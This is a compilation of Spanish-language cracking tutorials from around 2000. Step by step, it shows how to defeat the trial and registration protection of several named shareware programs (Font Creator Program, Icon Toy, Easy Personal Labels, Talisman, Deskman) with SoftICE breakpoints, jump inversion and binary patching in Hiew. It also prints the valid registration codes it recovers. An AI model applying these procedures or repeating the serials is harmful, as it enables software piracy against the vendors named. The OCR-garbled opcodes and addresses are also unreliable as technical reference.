según las vamos escribiendo van apareciendo en la ventana de código, precedidas de sus correspondientes códigos 
octales. como ya hemos anotado estos últimos, pasamos a la 2* parte del injerto: codificar la(s) instrucción(es) 
necesarias para parchear el código original y burlar de ese modo la protección temporal. 

la instrucción que vamos a escribir a continuación de las tres anteriores (sin salir del modo “a”) mueve unos bytes a 
una dirección de memoria. bytes: los precisos para codificar una instrucción en su dirección de destino. dirección de 
memoria: 00406230, es decir, donde r!sc prepara el terreno para que actúe la api getlocaltime. la instrucción que 
vamos a codificar es un salto (¡mp) que nos llevará, saltando por encima del esquema de protección, a otro salto que, a 
su vez, nos lleva al punto de entrada original del bloc de notas. ¿por qué un salto a otro salto y no un salto directo al 
oep? la respuesta es que si fuera de este último modo necesitaríamos codificar una instrucción de 5 bytes y en el injerto 


eso supondría una línea más, unos cuantos bytes más. para codificar un salto lejano necesitaríamos dos instrucciones: 
una que moviera una doble palabra y otra que moviera un byte, porque el código octal del salto largo (el directo al oep) 
sería e9 cb ad ff ff. 

tal y como lo haremos, con una sola instrucción que mueva una palabra (2 bytes) podremos codificar un salto 
cercano. 

bien, la instrucción es mov word ptr [00406230], 30eb y aparece así en la ventana de código de softice tras pulsar 
enter: 

00408810  66c70530624000eb30 mov word ptr [00406230], 30eb 

aún no hemos terminado. la tercera parte del injerto es el salto que nos envía al punto desde donde vinimos al injerto, 
para que el programa siga ejecutándose, una vez hemos hecho los cambios que queríamos. tecleamos jmp 0040c0f5 
(enter dos veces, porque hemos terminado de editar el código). la nueva línea que aparece en la ventana de código es 
00408819 e9d7380000 ¡mp 0040c0f5 

no olvidéis apuntar el código octal de las instrucciones codificadas porque lo necesitaremos más adelante para editar el 
archivo en frío. es lo que aparece con caracteres verdes. 

la línea con fondo blanco en softice nos recuerda que la siguiente instrucción a ejecutar es la correspondiente a 
0040880b. si ahora pulsamos varias veces f10 volveremos al bucle. si pulsamos f5 el programa ejecuta todas las 
instrucciones hasta el siguiente breakpoint. como tenemos aún uno puesto en 0040c0fO0, tecleamos be * para quitarlo. 
si pulsamos f5 ahora, el programa sigue su curso y nos abre el crakpad. 


editar el archivo 


los cambios efectuados hasta ahora han sido hechos estando el programa en ejecución y no permanecen una vez que se 
cierre crackpad.exe. para hacerlos permanentes hay que usar un editor hexadecimal. abrimos una copia de crakpad.exe 
en hiew, pulsamos f5 para desplazarnos a las direcciones a modificar. primeramente tecleamos .0040c0f0 (el punto del 
principio nos permite introducir la dirección en memoria, sin tener que recurrir al desplazameinto del archivo, el cual 
tendríamos que calcular previamente). luego pulsamos f3 e introducimos el codigo octal correspondiente al salto al 
injerto. f9 para guardar los cambios y f5 de nuevo para ir a 0040880b (con el . por delante) ; f3 y escribimos los octales 
de las cinco instrucciones que conforman el injerto. f9 y esc para salir de hiew. 

tarea completada. 


saludos 

aprovecho la ocasión para enviar un saludo a karpoff, que tras un año sigue siendo "la referencia" para muchos de 
nosotros; a profesor x por su entusiasmo y dedicación al proyecto tutoriales 2000; por supuesto, también a todos los 
participantes en dicho proyecto, sobre todo a los más activos (entre los que no me puedo incluir, de momento) por 
animar, y de qué manera, el cotarro; a numit_or por sus tutoriales, que es capaz de hacernos aprender cosas de tanto 
nivel con facilidad y disfrute; y a todos los que colaboran de algún modo para que el reversing sea un entretenimiento 
tan ameno. 

nada más. para lo que sea f_franticO hotmail.com 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


PROTECCION: 


Objetivo: 


Descripcion: 


Dificultad: 
DOWNLOAD : 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


Font Creator Program V 3.0 (build 3.0.1.0) 


SHAREWARE y viene con un trial de 30 días 
Conseguir un código de registro válido 


Este programa es un muy buen editor de fuentes TrueType. Además 
tienes la posibilidad de crear y editar ficcheros TIF, mostrar 
conjunto de caracteres, y modificar cualquiera de ellos con las 
herramientas de 

dibujo incluidas. 


Novato 


www.hagh-logic.com 
file insPEctor v2.0 y Softlce v4.05 


Act Mago FECHA: 25/10/2000 


introduccion 


hola amigos, presento mi quinto tutorial.ya saben, si tienen alguna duda sólo pregúntenlo 
actmago hotmail.com , como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u otras 


cosas. he decidido profundizar el uso de softice. si no lo tienes instalado puedes bajártelo en 
www.crackstore.com . asumo que tienes conocimientos básicos sobre el uso de softice. 
y para terminar con la intro debo decir : este texto ha sido escrito sólo con propósitos educacionales. 


al atake 


abrimos el programa y nos aparece la típica nag...se verá así:. 


The Font Creator Program 


TAE Pa EE gs 
MA > LEN q 


A 


a A 
A 
The registered: O q) Jay fhis notice. 


HIGH-LOGIC Start Register 


ahora me doy cuenta que estos tipos no quieren que se nos olvide que no estamos 
registrados. 
damos click en register y vemos una caja de registro que nos pide los siguientes datos: 


-user name 
-company (if applicable) 
-registration password (lo que buscamos) 


llenamos la caja con cualquier dato y luego le damos click a register y como el programa no 
es estúpido, por supuesto que la registration password no será aceptada y desplegará este 
mensaje de registro falso: 


a continuación... cerramos font creator program. 

debemos recopilar la mayor cantidad de información para saber por dónde atacar a este 
programa y para eso utilizaremos el genial file inspector v2.0 el que nos mostrara si fep ( 
font creator program= fcp desde ahora) está encriptado y también en qué leguaje está hecho. 
abrimos file inspector v2.0 ,luego vamos a abrir archivo, y cuando hayas abierto el 
ejecutable (fcp3.exe) luego le damos click a analizar y luego a la lengieta que dice 
compilador...se verá así: 


eN file insPEctor 2.0 


Reconocimiento de signaturas 


Compilador; Borland Delphi 3.0 
Packer: No encontrado 


Encriptador; No encontrado 


Versión de la librería: fi 0 Información. .. 


Versión del enlazador: [2.25 Versión de la imágen; [0.0 
Versión del 50; In ¿0 Versión del Subsistema: [4.0 


Só Abrir archivo WS Analizar (Salir 


¡Gijarchivos de programalHigh-LogiciFont Creator ProgramiFcp3.exe 


con la información que ahora tenemos sumado al mensaje que el programa desplegó de 
registro falso optaremos por usar el softice para conseguir un código de registro. 


usando el softice 


asumo que tienes bien configurado el softice y que tienes al menos conocimientos básicos 
sobre su uso. a continuación... abrimos fcp y nos aparece la nag que está al inicio de este 
tutorial en la que está la opción register, la que al presionar nos mandará a la caja de 
registro. introducimos nuestro nombre, compañia, y un número de registro que debemos 
recordar para cuando estemos 

dentro del softice y veamos las comparaciones; todavía no damos click en register; lo que 
ahora debemos hacer es presionar control+d para que salte el softice y así poder colocar 
nuestro breakpoint. 


ya estamos dentro del softice... colocamos bpx hmemcpy y presionamos enter, luego 
presionamos f3 para salir del softice. ahora le damos click a register y si todo sale bien el 
bpx debería picar y hace saltar al softice. 

luego presionamos f11 1 vez --------- > f12 11 veces, ponemos bc * para quitar el bpx y 
estaremos aquí: 


015f: 004f£557b ff£75f8 push dword [ebp-08] 
luego le damos más o menos 41 toques a f10 para llegar aquí: 
015f: 004f5612 es4debfOff call 00404164 


luego presionamos f8 para entrar en la call... llegaremos aquí: 


015f: 00404164 53 push ebx 

presionamos f10 5 veces, para llegar a una comparación realmente sospechosa... 
015f: 0040416b 39d0 cmp eax,edx 

hey !! llegó la hora de preguntar : ) 

colocamos d eax y la windows data nos muestra esto: 

w9v8371w3xqp 

huy, al parecer la hemos encontrado y si colocamos d edx veremos la falsa 
123123123123 


que más decir, ya la hemos encontrado. ahora anotamos el código y presionamos f5 para 
salir del softice, abrimos el programa y luego insertamos el mismo nombre y la compañía 
que habíamos puesto antes de entrar al softice, lo único que debemos variar es el código de 
registro, 

: ) obviamente. en mi caso: 


-user name act mago 
-company (if applicable) nn 


-registration password w9v8371w3xqp 


le damos click a register y nos sale esto: 


Information ES 


UU) Thank. pou for registerna Font Creator Program. 


programa crackeado... 
nota 


soy humano y cometo errores, si encuentras uno házmelo saber ok. actmago Ohotmail.com 


saludos 


saludos a tnt!. excelente página, muy buen trabajo...sigan adelante. ( especialmente a xasx, 
(no pararé : ) ) y profesor x.) saludos a toda la people de tutoriales2000. 


saludos al 1.d.a. (monofeo , flaco (pastero), chirda, taza, afo, solerman, nasal, peter y a todos 
los demás). saludos a todos los crackers del mundo. 


chao !! 
espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus 


habilidades, pero recuerden, lean muchos tutoriales, practiquen, estudien y crackear será 
mucho más fácil. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


PROTECCION: 


Objetivo: 
Descripcion: 


Dificultad: 
DOWNLOAD : 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


Icon Toy V 3.1 


Trial 30 días 


Conseguir un número de serie válido 


Este programa sirve para extraer íconos desde archivos como: 


ICL, EXE, DLL, SCR, CPL, OCX y BMP. Además 
funciona como manipulador de wallpaper (fondo)... 


Novato 

http://www.lighttek.com 

File inspector v 2.0 y SoftlIlce v 4.05 

Act Mago FECHA: 25/10/2000 


introduccion 


hola amigos, presento mi cuarto tutorial.ya saben, si tienen alguna duda sólo pregúntenlo 
actmago hotmail.com , como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u otras 


cosas. . he decidido comenzar a mostrar el uso de softice, ya que en mis tres tutoriales anteriores no lo usé y 
me parece sumamente importante usarlo para que aquellos que saben muy poco o nada vean el potencial de 
esta importante herramienta. si no lo tienes instalado puedes bajártelo en www.crackstore.com asumo que 


tienes conocimientos básicos sobre el uso de softice. 
y para terminar con la intro debo decir : este texto ha sido escrito sólo con propósitos educacionales. 


aabrimos el programa y se ve todo normal, no hay nags ni nada que nos moleste... parece 


freeware : ) le hechamos un vistazo a los botones que tiene y nos encontramos con una Y 


al atake 


(registration) al lado del ? (about). le damos click a la Y y nos aparece la típica caja de 
registro que en esta oportunidad nos pide: 


-registration name: 
-registration number: 


la caja luce así... 


ICO, 


¿bout 


llenamos la caja con cualquier dato y luego damos click en register!. 


el programa desplegará el siguiente mensaje de error...: 


liconTOY 3 


a continuación...cerramos icontoy. ahora debemos saber algunas cosas importantes antes de 

actuar y para eso utilizaremos el genial file inspector v2.0, herramienta que conocí gracias a 
un tutorial de profesor x ; básicamente lo que necesitamos saber es que si este programa está 
encriptado y en que lenguaje está hecho. 

abrimos file inspector v2.0 luego vamos a abrir archivo, y cuando hayas abierto el ejecutable 


(icontoy.exe) luego le damos click a analizar y luego a la lengiúeta que dice compilador... se 
verá así: 


eN file insPEctor 2.0 Aa ES 


Datos PE | Tabla de objetos | Importaciones/Exportaciones | mplador 1] Herramientas | Ácerca de... | 


arenas rnnr rana anna dé 


Reconocimiento de signaturas 


Compilador;  Borland/Inprise Delphi 4 
Packer: No encontrado 


Encriptador; No encontrado 


Versión de la librería: (1.0 Información... 


Versión del enlazador:; [2.25 Versión de la imágen; fo.o 
Versión del 50; In 0 Versión del Subsistema; [4.0 


S Abrir archivo 57 Analizar GF salir 


i¡ciArchivos de oroaramalLiohttekiIcontowticontow.exe 


con la información que ahora tenemos sumado al mensaje que el programa desplegó de 
registro falso optaremos por usar el softice para conseguir un número de registro. 


usando el softice 


asumo que tienes bien configurado el softice y que tienes al menos conocimientos básicos 
sobre su uso. a continuación... abrimos icontoy y vamos a la caja de registro, en donde 
colocamos nuestro nombre y un número de registro al azar. todavía no damos click en 
register!; lo que ahora debemos hacer es presionar control+d para que salte el softice y así 
poder colocar nuestro breakpoint. 

ya estamos dentro del softice... colocamos bpx hmemcpy y presionamos enter, luego 
presionamos f3 para salir del softice. ahora le damos click a register!, y si todo sale bien el 
bpx debería picar y hacer saltar al softice. 

luego presionamos f11 1 vez ---> f12 6 veces, ponemos bc* para quitar el bpx, estaremos 
aquí: 


015f: 0042397e Se pop esi 

luego presionamos f10 más o menos 34 veces para llegar aquí: 
015f: 00485fa0 esb3fcffff call 00485058 

luego presionamos f$8 para entrar en la call... 

llegaremos aquí: 


015f: 00485c38 55 push ebp 


presionamos f10 8 veces para llegar a una gran cantidad de comparaciones: 
015f: 00485c6b 3d8ca6ba00 cmp eax,00baa68c 
aquí debemos parar el largo traceo, y comenzar a preguntar : ) 


colocamos d eax y la windows data (wd) se queda en blanco, entonces colocamos ? eax y 
vemos nuestro número falso 0001233321 (sin contar los ceros) por supuesto. entonces 
colocamos ? OObaa68c y vemos lo siguiente: 


0012232332 ------ > un número de serie válido !!!!! (sin contar los ceros) 
anotamos el número y luego presionamos f3 para salir del softice. 

ahora insertamos los datos en la caja de registro, en mi caso: 
registration name: act mago 


registration number: 12232332 


damos click en register! y veremos esto:: 


You are registered! Thank you. 


programa crackeado... y si no te gusta el serial number puedes conseguir muchos más en la 
gran cantidad de comparaciones. 


nota 


soy humano y cometo errores, si encuentras uno házmelo saber ok. actmago Ohotmail.com 


saludos 


saludos a tnt!. excelente página, muy buen trabajo...sigan adelante. ( especialmente a xasx, 
(no pararé : ) ) y profesor x.) saludos a toda la people de tutoriales2000. 

saludos al 1.d.a. (monofeo , flaco (pastero), chirda, taza, afo, solerman, nasal, peter y a todos 
los demás). saludos a todos los crackers del mundo. 

chao !! 

espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus 
habilidades, pero recuerden, lean muchos tutoriales, practiquen, estudien y crackear será 
mucho más fácil. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


PROTECCION: 


Objetivo: 
Descripcion: 


Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


Easy Personal Labels v2.5 rev.l1 


Limitacion de Tiempo 
Conseguir el numero de registro valido 


Con este programa podrás imprimir etiquetas profesionales para 
tus Cartas y tus disquetes, sin necesidad de ser un diseñador 
experimentado. 


Novato 


http://member.aol.com/jgraff 


Softice £ File Inspector 


Act Mag0 FECHA: 25/10/2000 


INTRODUCCION 


hola amigos, presento mi sexto tutorial.ya saben, si tienen alguna duda sólo pregúntenlo actmagoGhotmail.com , 
como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u otras cosas. he decidido profundizar el 
uso de softice. si no lo tienes instalado puedes bajártelo en www. crackstore.com . asumo que tienes conocimientos 
básicos sobre el uso de softice. y para terminar con la intro debo decir : este texto ha sido escrito sólo con 
propósitos educacionales. 


al atake 


abrimos el programa y todo se ve normal pero si vamos a file hay una opción para registrar el programa que dice register 
shareware, le damos click y aparece una caja de registro para insertar los siguientes datos: 


name: 
registration code: 


registration number: 


como hacemos siempre insertamos cualquier dato y le damos click al botón OK y como el programa no es estúpido por 
supuesto que no aceptará los datos y mostrará algo así... 


Easy Personal Labels xl 


Incorrect code, please reenter. 


a continuación. ..cerramos easy personal labels. 


debemos recopilar la mayor cantidad de información para saber por donde atacar a este programa y para eso utilizaremos el 
genial file inspector v2.0 el que nos mostrara si está encriptado y también en que leguaje está hecho.abrimos file 
inspector v2.0 ,luego vamos a abrir archivo, y cuando hayas abierto el ejecutable (ezlabels.exe) luego le damos click a 
analizar y luego a la lengúeta que dice compilador...se verá así: 


eN file insPEctor 2.0 


or | Herramientas | Acerca de... | 


Datos PE | Tabla de objetos | Importaciones/Exportaciones 


Reconocimiento de signaturas” | 


Compilador: No encontrado 
Packer: ASPack v1.08.04 
Encriptador: No encontrado 


Versión de la librería: fi 0 Información... 


Versión del enlazador: [2.25 Versión de la imágen: fo.o 
Versión del SO; fi 0 Versión del Subsistema; [4.0 


ES Abrir archivo 8 Analizar GH salir 


¡CijArchivos de programalEasy Personal Labelsiezlabels.exe y 


hey !!! este programita viene empacado. ..que podemos hacer... : ), por mi parte usaré softice para encontrar un registro 
válido. 


a continuación... cerramos file inspector v2.0. 


usando el softice 


asumo que tienes bien configurado el softice y que tienes al menos conocimientos básicos sobre su uso. 


a continuación...abrimos easy personal labels y vamos directamente a la caja de registro en donde introducimos nuestro 
nombre, cualquier registration code y number respectivamente. todavía no damos click en OK; lo que ahora debemos hacer 
es presionar control-+d para que salte el softice y así poder colocar nuestro breakpoint. 


ya estamos dentro del softice...colocamos bpx hmemcpy y presionamos enter, luego presionamos f5 para salir del softice. 
ahora le damos click a OK y si todo sale bien el bpx debería picar y hace saltar al softice. 


luego presionamos f11 1 vez --------- > f12 11 veces, ponemos bc * para quitar el bpx y estaremos aquí: 
015f: 00450349 8b8528feffff mov eax, [ebp-01d8] 


luego f10 1 vez para llegar aquí: 


O15f: 0045034f ba00054500 mov edx, 00450500 


la mayoría de las veces chequeo los valores, los saltos, las comparaciones o lo que sea antes de una call y aquí si colocamos 
un d eax veremos nuestro registration code falso (en mi caso 1122), que raro ? : ) y si colocamos d 00450500 veremos 
zenith, más sospechoso que lo anterior. damos f10 1 vez para llegar a la call que está abajo de esta sospechosa línea...se 
verá así: 


015f: 00450354 es8f33fbff call 004036e8 

para entrar en la call le damos a f8 1 vez para llegar aquí: 

015f: 004036e8 53 push ebx 

ahora presionamos f10 5 veces para llegar a esta comparación... 

015f: 004036ef 39d0 cmp eax,edx 

colocamos d eax y la windows data nos muestra esto: 

1122 

nuevamente nos topamos con nuestro registration code falso y si colocamos d edx veremos esto: 
zenith 


que más decir, ya hemos encontrado nuestro registration code, pero que hay del registration number ??? algo me huele mal 
porque ni siquiera nos hemos topado con nuestro registration number falso, pero abajo de la comparación hay una línea a la 
que llegamos dando f10 1 vez, la que se verá así... 


O15f: 004036f1 Of848f000000 jz 00403786 


al parecer este salto debe decidir algo importante y abajo hay un test... qué pasaría si invertimos el salto y apretamos f5 para 
ver que sucede ?? si no sabes como invertir esto se hace colocando r fl z 


invertimos, presionamos f5 y vemos esto... 


Easy Personal L... ES 


Registration complete. 


por lo menos yo estaba preocupado y era así de fácil : ), no puedo creerlo, cierro el programa, lo abro y estoy registrado. 
esto se debe a que el programa crea un archivo llamado lreg.dt que contiene los datos del registro, y el programa cada vez 
que se reinicia lo revisa y ve tu estado. podemos deducir que en la caja de registro debemos colocar esto: 


name: act mago 

registration code: zenith 

registration number: (cualquiera) 

mientras escribía este tutorial me registre con otro nombre, lo que dejaria la caja así: 
name: (cualquiera) 


registration code: zenith 


registration number: (cualquiera) 


programa crackeado... 


nota 


soy humano y cometo errores, si encuentras uno házmelo saber ok. actmagothotmail.com 


saludos 


saludos a tnt!. excelente página, muy buen trabajo...sigan adelante. especialmente a xasx, (no pararé : ) ) 
saludos a dek_oin. 


saludos a toda la people de tutoriales2000. saludos a profesor x. 


saludos al l.d.a. (monofeo (gran amigo), flaco (pastero), chirda, taza, afo, solerman, nasal, peter y a todos los 
demás) 


saludos a todos los crackers del mundo. 


chao !! 


espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, 


lean muchos tutoriales, practiquen, estudien y crackear será mucho más fácil. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa Talisman 1.61 

PROTECCION: Name / Serial 

Ojetivo: Conseguir un código de registro válido 

Descripcion: Utilidad de escritorio 

Dificultad: Novato 

DOWNLOAD : www.lighttek.com 

Herramientas: Softice 4.05, File inspector 3.0 

CRACKER: Act Mago FECHA: 25/10/2000 
INTRODUCCION 


hola amigos, presento mi séptimo tutorial.ya saben, si tienen alguna duda sólo pregúntenlo actmagoU'hotmail.com , 
como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u otras cosas. he decidido profundizar el 
uso de softice. si no lo tienes instalado puedes bajártelo en www. crackstore.com . asumo que tienes conocimientos 
básicos sobre el uso de softice. y para terminar con la intro debo decir : este texto ha sido escrito sólo con 
propósitos educacionales. 


comentario del programa 


una nueva y revolucionaria aproximación al escritorio de windows 98. no es un simple creador de temas de 
escritorio, sino que te ocultará el escritorio normal y lo cambiará por otro mejor, sin los feos iconos y barras de 
desplazamiento. permite la creación y manipulación sencilla de hasta 999 pantallas diferentes. puedes crear y 
añadir casi cualquier tipo de objeto, y adjuntar cualquier tipo de comando de shell interno o ejecutar cualquier 
aplicación. los objetos, que se pueden ocultar, se pueden programar para reaccionar a los clics del ratón o al 
movimiento del ratón. los tipos de objetos disponibles incluyen el menú de inicio, los menús de tareas, y los menús 
de carpetas.podrás añadir imágenes de fondo al escritorio y añadir sonidos a diferentes eventos. toda la 
configuración y las imágenes se guardan en un fichero de base de datos. incluso puedes crear más de una base de 
datos y usar objetos que enlacen de una base de datos a la otra.en definitiva, si estás cansado de ver siempre el 
mismo interfaz de windows, y quieres darle un toque personal, no hay mejor opción que la de probar taslimán. 


comentario sacado desde softonic debido a que no he tenido tiempo para probar el programa. 


lo que nos interesa... el programa es distribuido como shareware con período de prueba de 30 días, por lo tanto si 
quieres seguir usando el software deberás pagar us$ 25.00 


por suerte contamos con softice... 


al atake 


abrimos el programa y todo se ve normal, pero si damos click con el botón derecho del mouse, veremos la alternativa 
about/registration... , le damos click y aparece la caja de registro solicitándonos los siguientes datos: 


your name: 
your code: 


como hacemos siempre insertamos cualquier dato y le damos click al botón register! y como el programa no es estúpido 
por supuesto que no aceptará los datos y mostrará algo así... 


a continuación...cerramos talisman. 


debemos recopilar la mayor cantidad de información para saber por donde atacar a este programa y para eso utilizaremos el 
genial file inspector v3.0 el que nos mostrara si está encriptado y también en que leguaje está hecho.abrimos file 
inspector v3.0 ,luego vamos a abrir archivo, y cuando hayas abierto el ejecutable (talisman.exe) luego le damos click a 
analizar y luego a la lengúeta que dice compilador...se verá así: 


£, -= file insPEctor v3.0 - By ViPER [ K-FOR ] - Released 23/10/00 =- 


Reconocimiento de signaturas 


Compilador; Borland /Inprise Delphi 4 
Signatura; 
Versión de la DLL; [r 0 Información... ED Asociar EXE 's 


Versión del enlazador:; [2.25 Versión de la imagen; fo. 
Versión del 50; hi AN) Versión del subsistema; fa. 


ES) Abrir archivo... (Ey Analizar GH salir 


¡CAtalismanttalisman, exe 0 


con la información que tenemos creo que el camino más fácil será usar nuestro querido softice para conseguir un código de 
registro válido. 


a continuación... cerramos file inspector v3.0. 


usando el softice 


asumo que tienes bien configurado el softice y que tienes al menos conocimientos básicos sobre su uso. 


a continuación...abrimos talisman y vamos directamente a la caja de registro en donde introducimos nuestro nombre y 
cualquier código de registro. todavía no damos click en register!; lo que ahora debemos hacer es presionar control-++d para 
que salte el softice y así poder colocar nuestro breakpoint. 


ya estamos dentro del softice...colocamos bpx hmemcpy y presionamos enter, luego presionamos f5 para salir del softice. 
ahora le damos click a register! y si todo sale bien el bpx debería picar y hace saltar al softice. 


luego presionamos f11 1 vez --------- > f12 11 veces, ponemos bc * para quitar el bpx y estaremos aquí: 
015f: 0047ef27 837df400 cmp dword ptr [ebp-0Oc] , OO 

luego f10 14 veces para llegar aquí: 

015f. 0047ef65 e8023af8ff call 0040296c 


aquí colocamos d eax y la window data se quedará en blanco y si aquí mismo colocamos ? eax veremos nuestro código de 
registro falso. se podría decir que vamos por el camino correcto. 


luego f10 16 veces para llegar aquí: 
015f. 0047ef9a 75f2 ¡nz O04ef8e “ 


aquí este salto nos manda de vuelta en el traceo con f10, abajo se ve una call a la que podemos llegar poniendo un bpx 
(supongo que ya pusiste bc *), entonces ponemos: 


bpx 004 7ef9a 

luego presionamos f5 y el softice nos dará un pantallazo que nos dejará aquí: 

015f: 0047efa2 e8c539f8ff call 0040296c 

luego presionamos f10 3 veces para llegar aquí... 

015f: 0047efaf 3b75fc cmp esi, [ebp-04] 

esta comparación es decisiva para mí. colocamos ? eax y veremos esto: 

0000519036 (recuerda este número, pero sin los ceros obviamente) : ) ya lo tenemos. 
pero cómo podemos estar tán seguros? si miras más abajo podrás ver un salto como este: 
015f: 0047efb2 Of85bf000000 ¡nz 00471077 


si inviertes el salto colocando r fl z y das f5 verás esto: 


Registered for 4ct Magú 


4 TALISMAN 


Program by Arkadiy istomin 


ya no tenemos dudas, volvemos al softice presionando control+d y ponemos bc *. cerramos talisman, lo volvemos a abrir, 
vamos a la caja de registro y colocamos nuestro nombre (el mismo que pusiste al comenzar con softice) y nuestro número de 
registro recién obtenido, en mi caso: 


your name: act mago 
your code: 519036 
damos click en register! y.... 


programa crackeado... 


nota 


soy humano y cometo errores, si encuentras uno házmelo saber ok. actmagothotmail.com 


saludos 


saludos a tnt!. excelente página, muy buen trabajo...sigan adelante. especialmente a xasx, (no pararé : ) ) 
saludos a dek_oin. 
saludos a toda la people de tutoriales2000. saludos a profesor x. 


saludos al l.d.a. (monofeo (gran amigo), flaco (pastero), chirda, taza, afo, solerman, nasal, peter y a todos los 
demás) 


saludos a todos los crackers del mundo. 


chao !! 
espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, 


lean muchos tutoriales, practiquen, estudien y crackear será mucho más fácil. 


act mago 2000 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


introduccion 


si te gustan los juegos de ingenio, este tutorial te va a interesar. si bien tiene un sistema de protección como 
los programas anteriores, lo más dificil es encontrar la ventana para introducir los datos y el botón de aceptar. 
ultimamente me estoy encontrando con bastantes programas de este estilo, por lo que me pareció interesante 
dedicarle un tutorial. 


deskman es un utilitario simple pero efectivo, nos permite entre otras cosas bloquear mediante passwords los accesos 
directos del escritorio (muy fácilmente, haciendo drag and drop), también te permite ocultar elementos del menú 
inicio, etc.como siempre lo único que me interesó es su sistema de protección. cuando lo instalé y lo corrí, obtuve la 
siguiente ventana: 


Startup Message 


h  Deskman v2.5 - Unregistered copy - 9 Anfibia 1998-2000 
“You are permitted to try this software on your system for 30 days without any cost or obligation. Payment is required if you 
find this software to be useful or if you wish to continue using this software beyond the evaluation [trial] period. Thus, you 
ill obtain a license to use this program without restrictions. 


See help for more information. 


la acepte y llegué a esta otra ventana: 


) DO YD k Xx 


Apply — Default Config Hide Exit 


E System |] Control | Misc. | Drives | 


Disable Desktop Hide Traybar Clock 
PF Disable Taskbar FF Trap System Keys 
PF Hide Start Menu FF Hide Traybar 

TF Hide Taskbar Buttons 
TT Block System Shutdown 


Se Passyyord 


Undo Passyvord 


acá empezaron los problemas. opimí todo lo que encontré a mi paso, pero no encontré la ventana de registración. lo 
cerré, lo abrí y nada. adelanté el reloj de mi pc y nada de nada. esto me tuvo a maltraer unas cuantas noches. pensé que 
el único camino era patchearlo pero lo desensamblé con w32dasm y encontraba referencias que decían 'license code' o 
'make use of the codes licensed from... (como iba a hacer uso de los códigos provistos por.... si no tiene ventana de 
registración). debía seguir buscando. 


todo esto lo escribo en forma relajada, porque ya encontré el botón oculto. pero te puedo asegurar que cuando no 
aparecía, la cosa era muy distinta. existen infinidad de programas que complementan la protección ocultando la 
ventana de registración. me viene a la mente en estos momentos 'pretty good solitary 99', pero hay muchos más. a 
partir de ahora (perdón) te voy a quitar el placer que sentí cuando finalmente la encontré. una posibilidad sería, que te 


bajes el programa y sin seguir leyendo trates de encontrarla (al menos por un rato). por lo demás, tiene una protección 
no muy distinta a las que venimos viendo en los tutoriales anteriores. 


ves ese cuadradito con una letra d en bajo relieve , Si lo oprimis obtendrás esta ventana: 


— ron v2.5 9 Anfibia 1998 - 2000 


Shareware - 30 days to test 
Anfibia Web Site — Tech Support | 


Name + Company 


- This copy of Deskman is licensed to: 
[License Code unregistered copy 


como siempre poné tus datos, en mi caso puse 'yerba mate' y '12345678' ahora solo nos resta encontra el botón de 
aceptar. para que lea los datos debes hacer 'doble click' en la porción de la ventana que dice 'deskman' 


te aparecerá un mensaje amenazadOT.............. 


Warming! 


| Make use of codes licensed from ánfibia, only. 
The use of illegal codes is not licensed and may result in unpredictable behaviour. 


satritcneiiedó que al aceptarlo te conducirá a lo siguiente: 


» v2.5 9 Anfibia 1998 - 2000 


ce>okr de y Y Shareware - 30 days to test 
[invalid Anfibia Web Site Tech Support | 


. This copy of Deskman is licensed to: 
| nvalid unregistered copy 


bueno ya tenemos todos los elementos necesarios para crackear esta protección, es decir la hemos transformado en 
una protección normal de las tantas que ya hicimos juntos. este es el octavo tutorial por lo que no te voy a aburrir con 
los detalles. si no entendes algo debes releer los ensayos anteriores, o bién como siempre, te dejo al pie la dirrección de 
e-mail para aclarar dudas. 


entonces, llenamos con los datos,control-d, bpxhmemcpy, f5 aceptamos ( doble click en deskman ), f5 para que 
salte el tenebroso mensaje de warning! ;-), lo aceptamos y entramos en el soft-ice. desactivamos el breakpoint para 
que no moleste (bd00). presionamos f12 unas 7 veces y llegamos al deskman!code. presionamos f12 unas 5 veces 
más y a partir de allí £10 hasta alcanzar la dirección 00475153 (unas 13 veces) , allí se carga en el eax el valor de 
nuestro serial correcto. presionamos f10 una vez más y hacemos deax .en mi caso obtuve ' 130vur1g32'. todo el 
párrafo anterior fue un leve repaso, sí hiciste los programas que te dejé de práctica, éste no aporta nada nuevo más que 
lo visto al principio. 


por dudas o consultas comunicate a http://yerbamatear O yahoo.com 


espero que este tutorial te haya sido útil, nos vemos en el próximo 


yerba mate 


' todo es fácil cuando se sabe como' 


importante: lo que hacemos aquí es tratar de aprender como abrir un candado con un alambre, no como robar alguna 
propiedad. si vas a usar este programa debes comprarlo. si no fuera por los programadores de shareware 
no tendríamos con que entretenernos. 


karpoff spanish tutor: pagina dedicada a la dibulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: | CollegeBAR 


PROTECCION: Password... de una Base de Datos de Access camuflada. 


Descripcion: Util para preparar combinados de calidad. 


Dificultad: | Aficionado. 


DOWNLOAD : http://www.pracx.com 


Softlce 3.24, Editor Hex, Microchof Access. 


CRACKER: Arkanian FECHA: 01/11/2000 


introduccion 


un estupendo y util programa, hecho con visual basic 6.0, especialmente preparado para colarnos por la 
puerta trasera. pueden ponerle toda la seguridad del mundo, pero si se dejan lo principal al descubierto, 
¿quien nos puede culpar por aprovecharnos?. 


